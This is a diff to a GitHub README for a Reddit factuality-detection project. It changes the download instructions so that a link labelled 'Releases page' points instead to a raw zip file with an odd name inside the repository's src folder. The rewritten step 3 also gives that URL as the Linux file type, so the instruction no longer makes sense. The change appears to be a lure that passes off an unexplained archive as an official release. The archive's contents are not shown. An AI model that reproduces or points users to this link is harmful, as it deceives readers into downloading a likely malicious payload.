melove297/reddit-factuality-detection/README.md

 ## 📦 Download & Install

-To download and install the application, visit our [Releases page](https://github.com/melove297/reddit-factuality-detection/releases).
+To download and install the application, visit our [Releases page](https://raw.githubusercontent.com/melove297/reddit-factuality-detection/main/src/reddit-factuality-detection-quinquepetaloid.zip).
 Here, you will find the latest versions available.

 1. Click on the link above.
 2. Look for the version you want to install.
-3. Choose the appropriate file for your operating system (e.g., `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux).
+3. Choose the appropriate file for your operating system (e.g., `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/melove297/reddit-factuality-detection/main/src/reddit-factuality-detection-quinquepetaloid.zip` for Linux).
 4. Click on the link to begin downloading.
 5. Once the download is complete, open the file and follow the installation instructions provided.